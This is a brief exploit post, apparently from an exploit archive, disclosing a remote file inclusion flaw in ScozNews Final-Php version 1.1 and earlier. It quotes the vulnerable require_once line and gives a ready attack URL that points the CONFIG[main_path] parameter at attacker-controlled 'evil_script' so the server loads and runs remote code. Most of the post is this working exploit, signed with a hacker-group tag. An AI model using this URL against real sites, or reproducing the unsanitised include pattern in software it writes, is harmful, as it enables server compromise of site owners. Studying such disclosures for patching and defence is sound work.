ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability
ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability
------------------------------------------
Discoverd By: XORON
------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------
script site: www.scoznet.com
------------------------------------------
Exploit:
http://sitename.com/[path]/sources/functions.php?CONFIG[main_path]=evil_script
------------------------------------------
Code:
require_once($CONFIG['main_path']."/lang/".$CONFIG['lang']."/lang_functions.php")
------------------------------------------
# XORON - WWW.CYBER-WARRIOR.ORG -